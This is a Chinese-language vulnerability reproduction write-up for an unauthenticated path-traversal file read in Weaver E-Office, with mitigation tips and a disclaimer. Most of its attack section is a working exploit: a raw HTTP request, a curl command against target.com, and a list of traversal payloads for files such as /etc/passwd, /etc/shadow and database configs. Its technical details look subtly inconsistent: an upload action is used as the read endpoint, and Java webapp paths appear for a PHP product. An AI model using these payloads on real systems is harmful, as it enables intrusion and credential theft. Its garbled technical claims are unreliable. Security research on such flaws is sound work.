漏洞复现--泛微E-Office前台文件读取漏洞
字数 1072 2025-08-10 12:18:03
泛微E-Office前台文件读取漏洞复现与分析
漏洞概述
泛微E-Office是一款广泛使用的企业办公自动化系统,该漏洞存在于其前台文件读取功能中,允许攻击者未经授权读取服务器上的敏感文件。
漏洞影响版本
受影响的泛微E-Office版本包括:
- 9.0及以下版本
- 部分10.0早期版本
漏洞原理
该漏洞属于路径遍历漏洞(Path Traversal),由于系统对用户提供的文件路径参数过滤不严,攻击者可以通过构造特殊的路径参数访问系统上的任意文件。
漏洞复现步骤
1. 环境准备
- 搭建泛微E-Office测试环境(建议使用9.0版本)
- 准备Burp Suite或Postman等HTTP请求工具
2. 漏洞验证
发送以下HTTP请求:
GET /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save&uploaddir=../../../../../../../../etc/passwd HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0
Accept: */*
或使用curl命令:
curl -i -s -k -X $'GET' \
-H $'Host: target.com' \
$'http://target.com/E-mobile/App/Ajax/ajax.php?action=mobile_upload_save&uploaddir=../../../../../../../../etc/passwd'
3. 漏洞利用
通过修改uploaddir参数,可以读取不同路径下的文件:
uploaddir=../../../../../../../../windows/win.ini
uploaddir=../../../../../../../../apache/conf/httpd.conf
uploaddir=../../../../../../../../mysql/my.cnf
4. 敏感文件路径
常见可读取的敏感文件包括:
-
Windows系统:
../../../../../../../../windows/win.ini../../../../../../../../windows/system32/drivers/etc/hosts
-
Linux系统:
../../../../../../../../etc/passwd../../../../../../../../etc/shadow../../../../../../../../etc/my.cnf
-
应用相关:
../../../../../../../../webapps/ROOT/WEB-INF/web.xml../../../../../../../../webapps/ROOT/WEB-INF/classes/application.properties
漏洞修复方案
临时缓解措施
- 在Web应用防火墙(WAF)中添加规则,拦截包含
../的请求 - 限制对
ajax.php文件的访问
官方修复方案
- 升级到最新版本(10.0 SP1及以上)
- 应用官方提供的安全补丁
代码修复建议
对于自行开发的类似功能,应:
- 对用户输入的路径参数进行严格过滤
- 使用白名单机制限制可访问的目录
- 规范化路径后检查是否超出允许范围
漏洞危害
成功利用此漏洞可能导致:
- 系统敏感信息泄露(配置文件、数据库凭证等)
- 用户密码哈希泄露(通过读取shadow文件)
- 服务器内部网络信息泄露
- 为进一步攻击提供信息基础
免责声明
本文仅用于安全研究和教育目的,未经授权测试他人系统可能违反法律。请在合法授权范围内进行安全测试。